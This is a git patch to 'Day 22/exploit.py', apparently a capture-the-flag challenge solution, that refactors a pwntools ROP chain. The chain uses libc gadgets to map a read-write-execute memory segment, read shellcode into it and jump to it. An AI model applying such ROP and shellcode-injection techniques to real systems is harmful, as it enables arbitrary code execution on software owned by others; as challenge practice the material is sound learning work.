From 3d8459f0fd5e9794e90386492ec8a01303c3b813 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder <mail@romanh.de>
Date: Fri, 22 Dec 2023 13:04:00 +0100
Subject: [PATCH] removed unnecessary ret gadget

---
 Day 22/exploit.py | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/Day 22/exploit.py b/Day 22/exploit.py
index e9c569f..136d569 100755
--- a/Day 22/exploit.py	
+++ b/Day 22/exploit.py	
@@ -88,8 +88,9 @@ def try_char(offset, char):
 
         pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
         pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
+        ret         = rop.find_gadget(['ret'])
 
-        rop.raw(rop.find_gadget(['ret']))
+        rop.raw(ret)
         rop.raw(pop_rcx_ret)
         rop.raw(32)
         rop.raw(pop_rdi_ret)
@@ -101,9 +102,7 @@ def try_char(offset, char):
         else:
             rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
 
-        rop.raw(rop.find_gadget(['ret']))
         rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
-
         rop.read(0, new_segment, 100)
         rop.call(new_segment)